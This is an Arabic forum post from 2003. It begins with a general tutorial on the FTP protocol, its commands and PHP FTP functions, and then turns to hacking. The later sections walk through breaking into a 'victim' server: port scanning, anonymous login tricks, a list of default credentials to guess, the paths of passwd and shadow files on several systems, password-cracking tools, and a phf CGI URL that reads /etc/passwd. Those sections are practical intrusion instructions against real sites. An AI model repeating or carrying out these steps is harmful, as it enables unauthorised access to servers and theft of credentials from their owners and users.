الاختراق عبر الــftp للاختراق أرجو التثبيت

الكاتب : Super Linx   المشاهدات : 2,347   الردود : 1    ‏2003-05-16
      مشاركة رقم : 1    ‏2003-05-16
  1. Super Linx

    Super Linx عضو متميّز

    التسجيل :
    ‏2003-02-24
    المشاركات:
    1,880
    الإعجاب :
    0
    أقدم لكم هذا الشرح المطول والممل عن FTP كهديه متواضعه مني لكم بمناسبة افتتاح مجلس الهكر

    مقدمة

    ظهرت خدمة بروتوكول نقل الملفات (FTP) في المراحل المبكرة من مسيرة الإنترنت، ولذلك فقد مرت بمراحل عديدة من التطوير للارتقاء بأدائها، ويعتقد الخبراء أن تطورها سيواكب تطور الإنترنت ويسير معها جنبا إلى جنب، مما سيعزز دورها في مستقبل التكنولوجيا في العالم السيبيري (cyber technology).


    ملاحظة:

    قد لا تؤدي عبارة خدمة بروتوكول نقل الملفات المعنى المطلوب منها، الذي ينص على أنها خدمة الإنترنت المستندة إلى بروتوكول نقل الملفات (Internet service based on File Transfer protocol)، وسعيا للاختصار نستخدم عبارة بروتوكول نقل الملفات أو خدمة نقل الملفات لتدل على المعنى نفسه.

    ماهو نقل الملفات FTP?

    FTP هي اختصار لكلمة File Transfer Protocol وتعني بروتوكول نقل الملفات، وهذه الخدمة هي احدى تسهيلات TCP/IP التي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزات FTP الرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم تشغيل مختلفة وعليه فلديها أشكال Formats مختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقوم به FTP, وبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفاً في أميركا الى جهازنا.

    ما هي خدمة بروتوكول نقل الملفات

    يُعد المصطلح FTP اختصاراً لبروتوكول نقل الملفات (File Transfer Protocol)، وهو طريقة سريعة لنقل الملفات (الكبيرة عادةً) بين أجهزة الكمبيوتر البعيدة عن بعضها والموجودة في شبكة تستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت.

    ويتشابه بروتوكول نقل الملفات (FTP) مع بروتوكول نقل النص المترابط (HTTP) في كون كلا البروتوكولين ينقل الملفات من الأجهزة الخادمة البعيدة (remote servers)، ولكنهما يختلفان في أن بروتوكول نقل النص المترابط (HTTP) يستخدم المستعرض (Web browser) لعرض الملفات المنقولة على شاشة المستخدم، وتكون تلك الملفات ذات محتوى متعدد الوسائط (Multimedia) –هذا المحتوى الذي يُميز صفحات الويب- ، بينما يُخزِن بروتوكول نقل الملفات (FTP) الملفات المنقولة على القرص الصلب لجهاز المستخدم.

    وتبرز أهمية هذه الخدمة عند نقل الملفات الكبيرة التي يعجز البريد الإلكتروني عن نقلها. إذ يمكن لبروتوكول نقل الملفات أن يتعامل مع أي نوع من الملفات سواء أكان معقداً مثل ملفات لغة النص المترابط (HTML) المضغوطة (compressed) وملفات الرسوم (graphic files)، أم بسيطاً مثل الملفات النصية (text files). ويمكن أن تُنقَل هذه الملفات من أجهزة خادمة بعيدة وتُخزَّن على القرص الصلب لجهاز المستخدم عن طريق عملية التنزيل (downloading)، كما تظهر فائدة استخدام خدمة بروتوكول نقل الملفات عند تصميم موقع شخصي على الويب، والحاجة إلى نقل ملفات الموقع إلى الأجهزة الخادمة (servers) عن طريق عملية التحميل (uploading). ويختلف بروتوكول نقل الملفات (FTP) عن البروتوكولات الأخرى التي لا تعتمد على الإنترنت في نقل الملفات مثل: Kermit، وXMODEM، إضافة إلى ZMODEM.


    FTP الخادم و FTP المستفيد


    تعتمد خدمة (FTP) على مبدأ الخادم/المستفيد (client/server)، ويكون فيه خادم FTP عبارة عن خادم ملفات يعتمد بروتوكول (FTP) في تحميل وتنزيل الملفات على أدلته (directories) شرط وجود الصلاحية المحددة باسم تعريف خاص (ID) وكلمة مرور (password) .

    ومن الجدير بالذكر أن الملفات الموجودة في خادم (FTP) تكون مضغوطة، وبالتالي يكون استرجاعها أكثر سرعة وسهولة، وتتعدد صيغ الملفات المضغوطة المستعملة؛ إذ نجد: .arc ، و .cpt ، و .zip، و .Z، بينما تكون صِيغ ملفات الرسوم من مثل: ".gif، و .jpg"، أما الملفات المخزنة بصيغة ثنائية (binary files) فتكون صيغها من مثل: ".hqx، و .uu". وإلى جانب الملفات السابقة تحتوي الأجهزة الخادمة لبروتوكول ملفات “read me” التي تبتدئ أسماؤها عادة بالرمز "00"، وبالتالي تظهر هذه الملفات في بداية القائمة. وتنبع أهمية التمييز بين أنواع الملفات من أن خدمة بروتوكول نقل الملفات تستخدم تعليمات مختلفة تتمتع بمواصفات نقل متمايزة لكل نوع من تلك الأنواع.

    ومن جهة أخرى، فإنه يلزم لنقل الملفات باستخدام بروتوكول (FTP) وجود برنامج يدعى برنامج مستفيد FTP (FTP client)، وهو برنامج يُمَكِّن المستخدم من تنزيل وتحميل الملفات من وإلى موقع FTP ما عبر شبكة تَستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت. وتوجد الكثير من التطبيقات التي تقوم بوظيفة مستفيد FTP وتُناسب مُختلف أنواع الأجهزة، ويمكن تنزيل الكثير منها مجاناً عن طريق الإنترنت.



    المستخدم (anonymous FTP)


    تسمح هذه الميزة للمستخدمين بالولوج إلى مواقع (FTP) دون الحاجة إلى التعريف بأنفسهم، إذ يمكنهم استخدام كلمة “anonymous” أو كلمة “ftp” على أنها اسم المستخدم (user-ID)، ويُوضع البريد الإلكتروني للمستخدم مكان كلمة مرور (password). ويغلب استخدام هذه الميزة في عمليات تنزيل الملفات من المواقع العامة التي توفرها بعض الجامعات والشركات الحكومية والخاصة على الإنترنت. ولكن مشكلة هذه المواقع تكمن في صعوبة الاتصال بها بسبب الضغط الكثيف عليها.

    لماذا خدمة بروتوكول نقل الملفات (FTP) بدلاً من البريد الإلكتروني ومستعرضات الويب؟

    تتميز خدمة (FTP) عن البريد الإلكتروني (Email) بأمور عديدة فهي أكثر فعالية في نقل الملفات الكبيرة، كما أنها أسرع من البريد الإلكتروني، مما يكفل تنفيذ المهمة نفسها في زمن أقل من زمن نقلها عن طريق البريد الإلكتروني، وهذا يجعل خدمة بروتوكول نقل الملفات أوفر.

    أما ما يُميز خدمة بروتوكول نقل الملفات (FTP) عن مستعرضات الويب (Web browsers) فهو:

    • تستطيع خدمة (FTP) القيام بعملية تحميل الملفات (uploading)، إذ تنقل المعلومات وخاصة وثائق (HTML) إلى الخادم البعيد الذي تُخزن عليه صفحات الويب.


    • تَستخدِم خدمة (FTP) أوامرَ (commands) لإجراء عمليات التحديث (حذف، أو إعادة تسمية أو نقل أو نسخ) على الملفات الموجودة على الخادم.


    • تدعم خدمة (FTP) السرية (privacy)، إذ يكون للمستخدمين المرخصين كلمات مرور (passwords) تسمح لهم بالولوج إلى الخادمات البعيدة.




    علاقة (FTP) مع البريد الإلكتروني:



    بدأت تُستخدم مؤخراً طريقة أخرى لاسترجاع الملفات عن طريق خادم بريدي خاص لخدمة (FTP)، لا تحتاج فيها إلى برنامج مستفيد FTP (FTP client)، ولكن يكفي أن يكون لك حساب بخدمة البريد الإلكتروني (Email account)، إذ يقوم خادم بريد بروتوكول نقل الملفات بالعمليات التي تقوم بها خدمة نقل الملفات، ثمَّ تُرسَل النتيجة عن طريق البريد الإلكتروني إلى المستخدم، ولا تخفى فوائد هذا التوظيف لخدمة بروتوكول نقل الملفات في البريد الإلكتروني لما تقدمه من سرعة وضمان في نقل الملفات الكبيرة، لم يكن بمقدور مستخدم البريد العادي الحصول عليها، وإليك فيما يلي أمثلة عن بعض الأجهزة الخادمة لبريد بروتوكول نقل الملفات (FTP):



    ftpmail@ppa.dec.com
    ftpmail@decwrl.dec.com
    ftpmail@src.doc.ic.ac.uk



    لولوج إلى (FTP) عن طريق مستعرضات الويب



    تُستخدَم مستعرضات الويب للولوج إلى ملفات موجودة في مواقع FTP، ويتم ذلك بسهولة عبر النقر على الروابط links. فللاتصال بموقع FTP تستبدل الحروف http في حقل العنوان (URL) بالحروف التالية ftp، ويكتب بعدها اسم الموقع (site name). ويمكن أن يُستخدم كل من:Netscape Navigator, Internet Explorer في الولوج إلى مواقع FTP، مع وجود الكثير من القيود التي لا يمكن حلها إلا بالحصول على التراخيص المناسبة.


    برامج مستفيد FTP
    يوجد العديد من برامج مستفيد FTP التي تعمل على أجهزة أي بي إم (IBM) أو الأجهزة المتوافقة معها، وتلائم العديد من أنظمة التشغيل (مثل: دوس (DOS)، وويندوز (Windows). كما إن نظم التشغيل الأحدث مثل ويندوز (Windows 95) 95 وويندوز (Windows 98) 98 وويندوز(Windows NT) NT تدعم خدمة بروتوكول نقل الملفات عبر برنامج خدمي (Utility program) هو ftp يظهر على شكل واجهة أوامر سطرية (command-line interface)؛ تشبه برنامج مستفيد FTP المُستخدم في نظام يونيكس (Unix)، كما تستخدم أجهزة أخرى تعمل على نظام يونيكس (Unix) برنامجَ مستفيد FTP آخر يدعى (NcFTP).

    كما توجد العديد من البرامج التي تعمل في بيئة رسومية تدعم خاصة السحب والإفلات (drag and drop)، ونذكر مثالين على هذه البرامج:



    • البرنامج WS FTP: للعمل على منصة التشغيل ويندوز (Windows).


    • البرنامج FETCH: للعمل على منصة التشغيل ماكنتوش (Macintosh).


    أقسام نقل الملفات:

    نقل الملفات ينقسم الى قسمين:

    ===================

    تنزيل الملفات Download:

    وهو جلب الملفات من الكمبيوتر المضيف Host الى الجهاز المحلي Local.

    ارسال الملفات Uplaod:

    وهو ارسال الملفات من الكمبيوتر المحلي Local الى الكمبيوتر المضيف Host.

    ومن الناحية الأمنية فهناك نوعان لنقل الملفات:

    نقل مؤمن Secure FTP:
    تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف.
    نقل مجهول Anonymous FTP:
    لاتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالباً استخدام guest أو anonymous عوضاً عنهما.

    تصنف مصادر البرامج على الانترنت الى ثلاثة أقسام:

    ملكية عامة Public Domain:
    وضعت البرامج هنا للاستخدام العام فليس هناك حقوق ملكية لأحد ولا قيود على استخدامها وتوزيعها وتعديلها.
    مصادر مجانية Freeware:
    يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر ولا يجوز تعديلها أو بيعها.
    مصادر مشتركة Shareware:
    يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد لاتتضمن جميع المميزات ويجب تحطيم النسخ بعد انتهاء مدتها.

    FTP والفيروسات:
    يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمين:
    ASCII:
    اختصاراً لـ(American Standard Code for Information Interchange) والملفات من هذا النوع تحتوي على سبعة جزيئات bits تتراوح قيمتها بين الصفر و 127. ويستخدم هذا المصطلح للتعبير عن المعيار الذي يقوم بتحويل الأحرف الى أرقام في الكمبيوتر. وتستخدم الملفات النصية هذا النوع من الصيغ.
    Binary:
    وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات bits تتراوح بين الصفر و 255 وتندرج الصور والبرامج والملفات المضغوطة تحت هذا النوع.

    والفيروسات لا يمكن أن تنتقل عبر ملفات ASCII كما لايمكن أن تنتقل عبر الصور كصيغ jpg & gif & bmp وغيرها من امتدادات الصور ولا عبر ملفات الفيديو والصوت مثل avi - ram - mpg - mp3 - wav وغيرها، وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة ماتكون: exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - b64 - bhx، كما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات MS Office، لذلك احذر من هذه الملفات وافحصها دائماً قبل تشغيلها.

    طريقة نقل الملفات FTP:

    هناك طرق عديدة لنقل الملفات وهي:

    نقل الملفات باستخدام نظام UNIX
    تتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر UNIX:

    ascii: لنقل ملفات ASCII النصية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر.

    binary: لنقل الملفات الثنائية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر.

    status: لفحص الملف ومعرفة هل هو من نوع ASCII أو Binary.

    help: لعرض قائمة بأوامر UNIX.

    dir: عرض محتويات الدليل

    ls: عرض محتويات الدليل الحالي.

    cd directory: تغيير الدليل.

    get filename: جلب الملف المطلوب وانزاله على جهازك.

    mget filename:جلب مجموعة من الملفات.

    pwd: طباعة الدليل الحالي.

    bye: انهاء الارتباط والخروج من النظام البعيد.

    نقل الملفات باستخدام حساب Shell:

    أول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمثلاً سوف تدخل حسابك في Tripod عن طريق Unix Shell، نكتب أولاً الأمر ftp متبوعاً بالوجهة المرادة فيصبح: ftp ftp.tripod.com ثم ندخل الاسم وهو عل سبيل المثال "IronPrivate"، ثم نقوم بادخال الرقم السري وهو مثلاً "******". وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر Unix المعتادة.

    نقل الملفات باستخدام المتصفح Browser:

    نقل الملفات عن طريق المتصفحات سهل جداً فما عليك سوى ادخال عنوان الموقع URL ويبدأ العنوان بكلمة //tp ثم العنوان بدلاً من كلمة //:http للعناوين العادية، بعد الدخول الى موقع الـFTP ستأتي الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب لانزاله.

    نقل الملفات باستخدام حساب SLIP/PPP:

    أفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة Client Programs. وأفضل برنامج تابع يمكن استخدامه للنوافذ Windows هو برنامج Ws_ftp.

    - استخدام برنامج Ws_ftp LE 5.06:

    ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج، سيظهر لك مربع حوار Session Profile والذي من خلاله تقوم بتسجيل الدخول، اكتب في خانة Profile Name اسم حساب الدخول؛ على سبيل المثال My Home Page In Tripod واكتب في خانة Host Name اسم الملقن وفي هذا المثال هو ftp.tripod.com ثم في خانة Host Type اختر Auto Detect لكي يقوم بالتدقيق التلقائي في نوع نظام الجهاز المضيف، بعد ذلك قم بكتابة الاسم في خانة User ID وهو مثلاً IronPrivate ثم الرقم السري في خانة Password وسيظهر مخفياً على هيئة نجوم ******, ثم اضغط OK. كما في الشكل التالي:


    [​IMG]

    بعد ذلك سيقوم البرنامج بالدخول الى الحساب المطلوب وستنقسم نافذة البرنامج الى قسمين؛ القسم الأيسر هو جهاز الكمبيوتر لديك والقسم الأيمن هو جهاز الكمبيوتر المضيف، في هذه المرحلة تستطيع جلب أو ارسال الملفات أو تغيير اسمائها أو حذفها ... الخ. أي تستطيع التحكم في محتويات حسابك على الانترنت أو على جهازك بسهولة فائقة.

    نقل الملفات باستخدام الاتصال الشبكي البعيد Telnet:

    Telnet هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر مضيف جاعلاً جهازه وكأنه جزء من ذلك الكمبيوتر البعيد. ويختلف العرض حسب نظام الكمبيوتر المضيف. اذا كان الجهاز البعيد يستخدم نظام Windows فلا مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعض الأوامر للتحكم وأهم أمر يجب أن تعرفه هو "؟" والذي يحضر لك قائمة بالأوامر اللازمة.

    استخدام برنامج Telnet من Windows:

    ترفق Windows برنامجاً سهلاً يسمى Telnet يمكنك الدخول عليه بالضغط على قائمة ابدأ Start ثم تشغيل Run ثم اكتب Telnet وستنفتح لك صفحة البدء للبرنامج.. من Connect اختر Remote System. في صندوق الحوار Connect الذي سيظهر لك اكتب في خانة Host Name اسم ملقن الجهاز المضيف ثم اكتب في خانة Port الميناء أو المنفذ ( اذا كان لديك) او اتركه كما هو، ثم اختر من الـTerm Type ، ان كان لديك والا قم بالتجربة. بعد ذلك اضغط Connect وعندما يتم الربط فستحتاج لادخال الاسم والرقم السري. وبعد الانتهاء من النقل اخترDisconnect من قائمة Connect وبعد ذلك اختر Exit.

    =========

    الاختراق :

    =======

    FTP
    أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البور
    21
    مفتوح و هو البور الخاص ب
    FTP
    و لتأكد من أن البور مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها


    Superscanne


    بعدما تتأكد ان البور مفتوح ننتقل الى الخطوة الثانية و هي
    إضغط على
    Start
    ثم
    Run
    ثم اكتب
    ftp –n
    سوف تطلع لك نافدة في الدوس مكتوب عليها
    FTP>
    ؤوكي لحد هنا كل شيء تمام
    و بعدين اكتب
    Open
    ثم إضغط على
    إدخال
    Enter
    سوف تتحصل عب النتيجة التالية
    FTP>
    To
    أكتب بجانب
    To
    رقم الإبي للضحية ثم إضغط على إدخال
    و الآن خد بالك معي

    إدا تحصلت على هدا الرد فقد تخطيت خطوة


    Connected to http://www.assassin.com/
    220 websrv1 Microsoft FTP Service (Version 4.0).


    و الآن أكتب الكتابة التالية


    ftp>quote user ftp


    إدا تحصلت على هدا الرد فقد تخطيت خطوة


    331 Anonymous acces allowed, send identify (e-mail name) as password.


    و الآن أكتب الكتابة التالية


    ftp>quote cwd ~root


    إذا تحصلت على هدا الرد فقد تخطيت خطوة


    530 Please login with USER and PASS


    ثم أكتب الكتابة التالية


    ftp>quote pass ftp


    إدا تحصلت على هدا الرد فقد تخطيت خطوة
    و نجحت في الإقتحام

    230 Anonymous user logged in.


    مبروك أنت الآن في جهاز الضحية
    ما عليك الآن الا ان تقوم بإستعمال
    اوامر الف تي بي


    و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الف تي بي و إدا اردتم ان تضحكو بقالي أكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء و لهدا
    قمت بحضير الى وامر لكي تطبقوها مباشرةا بعد نجاح الإقتحام

    Pwd


    لكي تعر ما يحتويه الهارد ديسك


    Cd


    لإقتحام مجلد مثال


    Cd black


    في هدا المثال قمت بإقتحام مجلد المسمى بلاك


    Ls


    لكي يتضح لك محتوى المجلد أو الهارد ديسك


    Get


    لكي تحمل الى سطح المكتب بتاع جهازك
    مثال


    Get black.exe
    Put
    العملية العكسية ل


    Get


    يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
    في جهاز الضحية
    مثال


    Put black.exe


    Clos


    لقطع الإتصال مع الضحية


    هدي أهم الأوامر و الآن سون تطرق على أنواع الرسائل الي نتحصل عليها من جهاز الضحية أثناء تطبيق الأوام و شرحها و ارقامها


    Codes: Signification:


    110 Restart marker reply.
    120 Service ready in nnn minutes. (nnn est un temps)
    125 Data connection already open; transfer starting.
    150 File status okay; about to open data connection.
    200 Command okay.
    202 Command not implemented, superfluous at this site.
    211 System status, or system help reply.
    212 Directory status.
    213 File status.
    214 Help message.
    215 NAME system type.
    220 Service ready for new user.
    221 Service closing control connection.
    225 Data connection open; no transfer in progress.
    226 Closing data connection.
    227 Entering passive mode (h1, h2, h3, h4, p1, p2).
    230 User logged in, proceed.
    250 Requested file action okay, completed.
    257 "PATHNAME" created.
    331 User name okay, need password.
    332 Need account for login.
    350 Requested file action pendingfurther information.
    421 Service not available, closing control connection.
    425 Can't open data connection.
    426 Connection closed; transfer aborded.
    450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
    451 Requested action aborded: local error processing.
    452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
    500 Syntax error, command unrecognized.
    501 Syntax error in parameters or arguments.
    502 Command not implemented.
    503 Bad sequence of commands.
    504 Command not implemented for that parameter.
    530 Not logged in.
    532 Need account for storing files.
    550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...)
    551 Requested action aborded: page type unknown.
    552 Requested file action aborded.
    553 Requested action not taken. (Nom de fichier non attribué

    نقل الملفات سو فنتناول في هذالدرس دوال نقل وجلب الملفات وحذف وإعادة تسمية الملفات فإلى الدرس


    1- الدالة ftp_put

    boolean ftp_put(integer link, string remot, string local, integer mode);

    تقوم هذه الدالة بإرسال ملف من الحاسوب الشخصي إلى الخادم مرر لها رقم الاتصال واسم الملف البعيد (remote) في الخادم واسم الملف المحلي ونوع الملف mode الذي يأخذ إحدى قيمتين هي FTP_ASCII, FTP_IMAGE القيمة الأولى للملفات النصية والقيمة الثانية لملفات الصور.


    2- الدالة ftp_get

    boolean ftp_get(integer link, string local, string remote, integer mode);

    تقوم الدلة بعكس ما تقومو به الدالة السابقة فهي تجلب ملف من الخادم إلى الحاسوب الشخصي ومرر لها مثل المعطيات السابقة.


    3-الدالة ftp_rename

    boolean ftp_rename(integer link, string orignal, string new);

    تقوم هذه الدالة بتغيير اسم ملف موجود في الخادم مرر لها رقم الاتصال واسم الملف الموجود واسم الملف الجديد الذي تريده.

    4- الدالة ftp_delete

    boolean ftp_delete(integer link , string path);

    تقوم هذه الدالة بحذف ملف موجود في الخادم مرر لها رقم الاتصال ومسار الملف.

    5-الدالة ftp_size

    boolean ftp_size(integer link , string path);

    تعيد هذه الدالة حجم الملف الموجود في الخادم والممر إليها مساره بالبايت .


    6- الدالة ftp_pwd

    string ftp_pwd(integer link);

    تعيد هذه الدالة اسم المجلد الحالي في الخادم

    7- الدالة ftp_fput

    boolean ftp_fput(integer link, string remot, integer file, integer mode);
    تقوم هذه الدالة بما تقوم به الدالة ftp_put تقريباً إلا أنها تكتب محتويات الملف البعيد من ملف مفتوح في الحاسوب الشخصي مسبقاً باستخدام الدالة fopen (سنقوم بشرحها لاحقاً في دورة خاصة بالملفات) مرر إلى الدالة مؤشر الملفبدلاً من مساره

    8- الدالة ftp_fgret

    boolean ftp_fput(integer link, integer file, string local, integer mode);
    تقوم هذه الدالة بعكس ما تقوم به الدالة السابقة، فهي تنسخ ملفاً موجوداً في الخادم إلى الحاسوب الشخصي.

    9-الدالة ftp_systype

    string ftp_systype(integer link);
    تقومم هذه الدالة بإعادة نوع النظام المستخدم في الخهاز الخادم.

    10- الدالة ftp_mdtm

    string ftp_systype(integer link, string path);
    تعيد هذه الدالة تاريخ التعديل الأخير للملف المعطى لها.

    11-الدالة ftp_pasv

    booleab ftp_systype(integer link, boolean on);
    استخدم هذه الدالة لتبديل حالة تفعيل الملف الحالة الافتراضية أنه غير مفعل.

    12-الدالة ftp_rawlist

    array ftp_systype(integer link, string directory);
    تعيد هذه الدالة صف من المخرجات في المجلد المعطى.

    الأوامر الشائعة في (FTP):

    الوظيفة الأمر

    يأمر خادم بريد (FTP) بالاتصال بموقع (FTP) المطلوب:


    Connect.host.domain.ext

    [userID] [password]


    Connect site name


    يأمر الخادم البريدي (FTP) بإرسال الجواب إلى عنوانك:

    Reply ID@domain.ext

    Reply


    سيرسل خادم بريد (FTP) قائمة بالدليل (directory) الحالي.

    Is


    يُستخدَم هذا الأمرفقط عند جلسات بريد (ftpmail) FTP، ويكون قبل أمر get.


    Chdir/directory/dir
    Chdir


    تُرسل الملفات بصيغة الآسكي (ASCII).

    ASCII


    يُستخدَم هذا الأمر لاستقبال الملفات في الصيغة الثنائية، وذلك من أجل الملفات المضغوطة أو التطبيقات.

    Binary


    يرمّز الملفات في صيغة Uuencode.

    Uuencode


    يخزن نسخة من ملف -موجود في جهاز المستخدم- في الخادم البعيد

    Put


    يجلب هذا الأمر الملف المحدد من الخادم

    Get filename


    يَجلب عدة ملفات من الخادم

    Mget


    يُخزن عدة ملفات -موجودة في جهاز المستخدم- في الخادم البعيد.

    Mput


    تعرض قائمة مساعدة لكل الأوامر أو لأحدها:

    :Help .1 يعرض مساعدة لكل الأوامر الصحيحة.

    :Help put .2 المساعدة الخاصة بالأمر put.


    help


    تُنهي الاتصال (connection) الحالي، وتخرج من برنامج FTP.

    Quit


    تُنهي الاتصال (connection) الحالي دون الخروج من برنامج FTP.


    الاختراق عن طريق نظام التشغيل ويندوز فقط


    الإختراق من خلال نظام التشغيل ويندوز يتم بطريقتين لا ثالث لهما(حسب المعلومات التي لدي) والطريقتين هما:
    اولاً: عن طريق التلنت Telnet.
    ثانياً:عن طريق المتصفح.

    ونحنُ من خلال احد هاتين الطريقتين او بهما معا نبحث عن منفذ او ثغره توصلنا للملف الذي يحتوي على اسم المستخدم وكلمة السر لهذا المستخدم الذي يمكنه التحكم بالموقع من خلال لوحة التحكم في الموقع او من خلال وصوله لمحتوى الموقع عن طريق برنامج نقل الملفات FTP .
    هذا الملف(الذي يحوي اسم المستخدم وكلمة السر) غالبا يكون اسمه passwd وهو في هذه الحاله يحتوي على كلمة سر مشفره تحتاج برامج لكسر هذه الشفره واشهر هذه البرامج:
    1. cracker jack 1.4
    2. john the rippet 1.5

    وقد يكون اسم هذا الملف shadow وفي هذه الحاله تكون كلمة السر في داخله مظلله(عباره عن رموز مثل ؟x!) كلمة السر المظلله لايمكن فك هذا التظليل عنها ولذلك لا فائده مرجوه من هذا الملف يجب ان نبحث عن الملف الذي يحوي كلمة سر مشفره وليست مظلله.
    وقد يكون اسم هذا الملف( الذي يحوي اسم المستخدم وكلمة السر) root او nobody او daemon او ftp او ftplogin او bin او group ... وغيرها الكثير.
    ويقع هذا الملف غالبا داخل مجلد اسمه etc .

    - حددنا الهدف المنشود وهو الملف الذي يحوي اسم المستخدم وكلمة السر.
    - بقي ان نعرف نظام التشغيل لسيرفر الموقع الضحيه والمنافذ المفتوحه عليه لكي نتسلل من خلالها للهدف.. ويتم فحص الموقع لمعرفة نظام التشغيل من خلال عدة طرق وهي كما يلي:
    1. ارسال رساله مجهوله للموقع مثل: jkijhsnxz@naseej.com سترجع لك رسالتك لتخبرك ان هذا العنوان المرسل له غير صحيح وغير موجود بالموقع ومن خلال هذه الرساله يمكن التعرف على الآي بي للموقع ونظام التشغيل الخاص به.
    2. من خلال خاصية الـ finger وذلك بارسال ايميل للموقع الضحيه بهذا الشكل finger@naseej.com .
    3. بإستخدام خاصية الـ whois وذلك بالطريقه التاليه: whois@naseej.com .
    4. عن طريق برنامج Whats Running (لا اعرف عنه سوى اسمه).
    5. عن طريق برامج مسح المنافذ scan ports مثل برنامج super scan وبرنامج site scan وبرنامج shadow scan .
    6. من خلال نزع التوقيع لمنافذ الموقع الضحيه وذلك بإستخدام التلنت Telnet وأشهر المنافذ التي يمكن نزع تواقيعها مايلي:

    21 للـ FTP
    23 للـ Telnet
    25 للـ smtp
    43 اللـ whois
    80 للـ http
    110 للـ pop3
    143 للـ Imap
    بعد معرفة نظام التشغيل نقدر نحدد مكان الملف المنشود الملف الهدف كمايلي:

    النظام مكان الملف

    Sunos 5.0 etc/shadow او etc/passwd
    Linux etc/shadow او etc/passwd
    BSD4.3 –RENO etc/master.passwd
    AIX etc/security/passwd
    NT ويندوز s***pts/passwd

    بقي علينا ان نتسلل الى هذا الملف باختراق سيرفر الموقع وذلك من خلال احد الطريقتين السابقتين:
    الاولى : التلنت
    فمثلا لو كان المنفذ المفتوح هو 21 ftp نصل الى الملف الهدف بالطريقه التاليه:
    1. نشبك التلنت على الموقع بهذا الشكل ftp.http://www.naseej.com/ ونضع المنفذ 21
    2. التسلل من من خلال اسم المستخدم ورقمه السري ولكن كيف ونحن لم نحصل عليهم؟ هنالك اسم مستخدم ورقم سري عام يمكن التسلل من خلالهما وبخفيه وهما بالشكل التالي: اسم المستخدم: Anonymous والرقم السري أي بريد الكتروني مثل: asx@czv.com ( هذه الخاصيه العامه غالبا ماتكون في برامج نقل الملفات الـ FTP اما في التلنت فهي نادرة الوجود ومن هذا نستنتج ان هنالك طريقه ثالثه في حالة كون الموقع يدعم منفذ 21 وهي التسلل من خلال فتح احد برامج نقل الملفات FTP والتسلل عن طريقه بإستخدام اسم المستخدم وكلمة السر العامه سالفة الذكر) واذا لم تستفد من اسم المستخدم العام والكلمه السريه التابعه له في التلنت يمكن ان تجرب هذه الاسماء وكلمات المرور الخاصه بها:
    اسم المستخدم كلمة المرور
    Anonymous anonymous
    Guest guest
    Root root
    Sys sys
    Sys sysadm
    Sys system
    Games games
    ftp ftp
    mail mail
    young test
    بعد ان تنجح في الدخول للنظام عن طريق التلنت يجب عليك انشاء وصله إرسال وإستقبال البيانات وذلك من خلال الأمر PASV وسيرد عليك السيرفر الخادم برقم الآي بي والمنفذ المفتوح الخاص به مثل :
    Entering passive mode (207.18.69.61.12.41)
    فرقم الآي بي هو 207.18.69.61
    ورقم المنفذ يتم استخراجه من خلال حساب الرقمين الاخيرين كما يلي:
    12*256+41=3113
    اذا المنفذ المفتوح هو 3113 , بعد معرفة رقم الآي بي ورقم المنفذ المفتوح عليه نقوم بفتح نافذة جديده للتلنت ونكتب رقم الاي بي ( او اسم الموقع) ورقم المنفذ الذي حصلنا عليه بهذا الشكل ftp.naseej.com ورقم المنفذ هو 3113 ثم نبدأ بإرسال الاوامر عن طريق النافذه الأولى للتلنت واستقبال نتائج هذه الاوامر من خلال النافذه الثانيه ومن هذه الاوامر المتعلقه بالتلنت مايلي:
    LIST لعرض محتويات السيرفر وماعليه من ملفات وبرامج
    GET لجلب وسحب مانريد من ملفات او برامج من على هذا السيرفر
    SEND لإرسال ماتريد للسيرفر.
    وايضا هنالك اوامر للتلنت مثل:
    PWD و LS و MKDIR و RMDIR و CP وmv وrm وGrep و passwd و chmod وهذا ماقرأت ولكن للأسف لا اعرف ما استخداماتها.
    وهكذا كل نظام له اوامره الخاصه به.

    الطريقه الثانيه : هي التسلل عن طريق المتصفح فمثلا اردنا التسلل للملف الهدف او البحث عنه من بين الملفات الموجوده في الموقع الضحيه يمكن ذلك عن طريق المتصفح بهذا الشكل:
    http://www.naseej.com/cgi-bin/phf?Q.../cat/etc/passwd
    واذا لم يكن الموقع يدعم برامج السي جي يمكن من خلال هذا الطرق:
